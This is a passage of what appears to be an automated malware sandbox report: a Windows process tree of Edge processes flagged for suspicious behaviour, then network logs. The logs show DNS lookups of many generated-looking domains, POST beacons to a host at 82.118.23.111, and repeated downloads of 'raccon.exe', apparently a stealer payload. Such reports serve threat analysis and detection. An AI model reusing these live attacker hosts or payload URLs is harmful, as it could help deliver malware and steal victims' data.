                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:5340
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Modifies registry class
                                                                                    PID:3500
                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                      C:\Windows\system32\WerFault.exe -u -p 3500 -s 1844
                                                                                      2⤵
                                                                                      • Program crash
                                                                                      PID:5192
                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                    1⤵
                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                    PID:5756
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                      PID:4056
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:5596
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                      1⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Modifies registry class
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:3632
                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                      1⤵
                                                                                      • Modifies Internet Explorer settings
                                                                                      PID:3188
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:3016
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:3104
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:2064
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:4172
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:5088
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:5268
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                        PID:5232
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:4892
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:4840
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                          PID:1244
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:3576
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:5360
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:976

                                                                                        Network

                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test481-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test481-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test571-service10020125999080321.pro
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test571-service10020125999080321.pro
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test461-service10020125999080321.host
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test461-service10020125999080321.host
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test231-service10020125999080321.fun
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test231-service10020125999080321.fun
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321tostest371-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321tostest371-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321oopoest361-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321oopoest361-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder481-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder481-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder471-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder471-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder351-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder351-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder241-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder241-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-service100201shop25999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-service100201shop25999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-service100201life25999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-service100201life25999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-service100201blog25999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-service100201blog25999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321megatest251-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321megatest251-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321megatest251-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321megatest251-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321infotest341-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321infotest341-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321besttest971-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321besttest971-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321shoptest871-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321shoptest871-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          ka-f.fontawesome.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          ka-f.fontawesome.com
                                                                                          IN A
                                                                                          Response
                                                                                          ka-f.fontawesome.com
                                                                                          IN CNAME
                                                                                          ka-f.fontawesome.com.cdn.cloudflare.net
                                                                                          ka-f.fontawesome.com.cdn.cloudflare.net
                                                                                          IN A
                                                                                          172.64.133.9
                                                                                          ka-f.fontawesome.com.cdn.cloudflare.net
                                                                                          IN A
                                                                                          172.64.132.9
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321kupitest451-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321kupitest451-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321proftest981-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321proftest981-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321clubtest561-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321clubtest561-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321mytest151-service1002012425999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321mytest151-service1002012425999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfoldert161-service1002012425999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfoldert161-service1002012425999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder100251-service25999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder100251-service25999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder100241-service10020999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder100241-service10020999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder100231-service1022020.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder100231-service1022020.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder100221-service1022020.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder100221-service1022020.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          IN A
                                                                                          82.118.23.111
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 339
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:18 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 267
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:18 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 150
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 286
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 361
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 143
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 291
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 75
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • GET
                                                                                          http://999080321newfolder1002-01462599908032135.site/raccon.exe
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          GET /raccon.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:19 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 550912
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Last-Modified: Fri, 09 Jul 2021 23:01:01 GMT
                                                                                          ETag: "86800-5c6b8bed9f570"
                                                                                          Accept-Ranges: bytes
                                                                                        • POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 164
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:20 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 366
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:20 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 75
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • GET
                                                                                          http://999080321newfolder1002-01462599908032135.site/raccon.exe
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          GET /raccon.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:20 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 550912
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Last-Modified: Fri, 09 Jul 2021 23:01:01 GMT
                                                                                          ETag: "86800-5c6b8bed9f570"
                                                                                          Accept-Ranges: bytes
                                                                                        • POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 209
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:21 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 329
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:21 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 75
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • GET
                                                                                          http://999080321newfolder1002-01462599908032135.site/raccon.exe
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          GET /raccon.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:22 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 550912
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Last-Modified: Fri, 09 Jul 2021 23:01:01 GMT
                                                                                          ETag: "86800-5c6b8bed9f570"
                                                                                          Accept-Ranges: bytes
                                                                                        • POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 235
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:23 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • POST
